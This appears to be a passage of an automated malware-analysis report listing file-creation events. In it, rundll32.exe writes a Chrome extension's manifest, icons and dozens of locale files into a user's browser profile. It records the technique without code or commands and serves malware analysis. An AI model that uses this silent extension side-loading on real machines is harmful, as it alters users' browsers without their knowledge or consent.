Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\teJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\te\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\thJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\th\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\trJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\tr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ukJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\uk\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\viJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\vi\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_CNJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_CN\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_TWJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_TW\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoecJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\iconsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\ficon128.pngJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon128.pngJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon16.pngJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon48.pngJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\manifest.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_localesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\amJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\am\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\arJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ar\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\beJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\be\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bgJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bg\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bnJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bn\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\caJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ca\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\csJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\cs\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\daJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\da\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\deJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\de\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\elJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\el\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\enJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_GBJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_GB\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_TOJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_TO\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_USJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_US\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\esJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es_419Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es_419\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\etJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\et\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\faJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fa\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fi\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\filJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fil\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\frJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\guJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\gu\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\heJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\he\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hi\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\huJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hu\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\idJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\id\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\itJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\it\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\jaJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ja\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\knJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\kn\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\koJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ko\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ltJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lt\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lvJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lv\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mkJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mk\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mlJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ml\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\msJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ms\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\nlJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\nl\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\noJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\no\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\plJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pl\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ptJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_BRJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_BR\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_PTJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_PT\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\roJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ro\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ruJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ru\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\skJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sk\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\slJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sl\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sqJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sq\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\srJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\svJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sv\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\swJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sw\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\taJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ta\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\teJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\te\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\thJump to behavior
